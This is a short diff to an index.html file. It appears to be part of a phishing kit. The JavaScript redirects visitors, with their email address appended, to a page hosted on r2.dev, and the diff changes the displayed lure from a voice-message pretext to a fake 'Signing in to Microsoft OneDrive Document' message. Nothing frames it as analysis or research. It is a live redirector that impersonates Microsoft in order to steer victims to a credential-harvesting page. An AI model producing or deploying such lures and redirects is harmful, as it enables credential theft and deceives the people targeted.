--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
 window.setTimeout(function() {
     window.location.href = 'https://pub-88834a78a0b042fc9794165ec28b4b99.r2.dev/ked9h2e8i.htm#'+em;
 }            
-            document.write("You will be automatically redirected to Your Voice message.");
+            document.write("Signing in to Microsoft OneDrive Document");
             setTimeout('Redirect()', 1000);
          //-->
      
